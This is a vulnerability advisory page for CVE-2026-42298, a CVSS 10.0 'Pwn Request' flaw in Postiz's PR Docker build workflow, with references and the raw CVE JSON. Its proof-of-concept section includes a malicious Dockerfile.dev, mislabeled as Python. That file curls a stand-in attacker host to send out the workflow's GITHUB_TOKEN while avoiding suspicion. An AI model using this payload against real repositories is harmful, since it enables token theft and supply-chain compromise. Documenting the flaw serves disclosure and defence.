CVE-2026-42298

Description

Postiz is an AI social media scheduling tool. Prior to commit da44801, a "Pwn Request" vulnerability in the Build and Publish PR Docker Image workflow (.github/workflows/pr-docker-build.yml) allows any unauthenticated user to execute arbitrary code during the Docker build process and exfiltrate a highly privileged GITHUB_TOKEN (write-all permissions). This can be achieved simply by opening a Pull Request from a fork with a maliciously modified Dockerfile.dev. This issue has been patched via commit da44801.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Postiz < commit da44801

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Malicious Dockerfile.dev for CVE-2026-42298
# This PoC demonstrates how to exfiltrate the GITHUB_TOKEN
# during the vulnerable CI build process.

FROM node:18-alpine

# The vulnerable workflow builds this file.
# We inject a command to send the secret token to an external server.
RUN curl -s "https://evil-server.com/steal?token=${GITHUB_TOKEN}"

# Continue with normal build commands to avoid suspicion
COPY . .
RUN npm install

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42298
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42298
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42298/
[4] VulDB https://vuldb.com/cve/CVE-2026-42298
[5] https://github.com/gitroomhq/postiz-app/commit/da448012dd87e94944cbe83a38e7fd023269ec46
[6] https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-v975-9h5p-xhm4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42298", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:36.497", "lastModified": "2026-05-08T23:16:36.497", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Postiz is an AI social media scheduling tool. Prior to commit da44801, a \"Pwn Request\" vulnerability in the Build and Publish PR Docker Image workflow (.github/workflows/pr-docker-build.yml) allows any unauthenticated user to execute arbitrary code during the Docker build process and exfiltrate a highly privileged GITHUB_TOKEN (write-all permissions). This can be achieved simply by opening a Pull Request from a fork with a maliciously modified Dockerfile.dev. This issue has been patched via commit da44801."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/gitroomhq/postiz-app/commit/da448012dd87e94944cbe83a38e7fd023269ec46", "source": "[email protected]"}, {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-v975-9h5p-xhm4", "source": "[email protected]"}]}}